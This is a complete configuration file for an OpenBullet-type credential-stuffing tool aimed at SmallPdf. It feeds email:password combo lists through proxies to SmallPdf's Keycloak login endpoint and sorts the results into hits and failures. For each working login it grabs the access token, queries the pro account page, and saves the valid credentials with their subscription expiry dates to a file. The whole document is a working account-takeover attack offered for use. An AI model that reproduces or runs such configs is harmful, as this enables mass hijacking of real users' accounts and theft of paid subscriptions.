[SETTINGS]
{
  "Name": "SmallPdf [Adi Nair]",
  "SuggestedBots": 100,
  "MaxCPM": 100,
  "LastModified": "2023-03-02T14:58:57.9367244+05:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Adi Nair",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "SmallPdf [Adi Nair]",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": @aDiThYaH_nAiR,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#POST REQUEST POST "https://keycloak.smallpdf.com/auth/realms/smallpdf-production/protocol/openid-connect/token" 
  CONTENT "grant_type=password&client_id=web&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 90" 
  HEADER "origin: https://smallpdf.com" 
  HEADER "referer: https://smallpdf.com/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "" 
  KEYCHAIN Failure OR 
    KEY "{\"error\":\"invalid_grant\",\"error_description\":\"Invalid user credentials\"}" 

#AUTHORIZATION PARSE "<SOURCE>" LR "{\"access_token\":\"" "\",\"" -> VAR "AUTHORIZATION" 

#GET_ACCOUNT REQUEST GET "https://pro.smallpdf.com/pro/account" 
  
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "authorization: <AUTHORIZATION>" 
  HEADER "origin: https://smallpdf.com" 
  HEADER "referer: https://smallpdf.com/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 

#EXPIRATION PARSE "<SOURCE>" LR "\",\"expiration_date\":\"" "\",\"" -> VAR "EXPIRATION" 

#CREATED_AT PARSE "<SOURCE>" LR "\",\"createdAt\":\"" "T" -> VAR "CREATED_at" 

#CAPTURED_DATA UTILITY File "test.txt" Write "<USER>:<PASS> | Created_on = <CREATED_AT> | Expiry_Date = <EXPIRATION>" -> VAR "CAPTURED_DATA" 

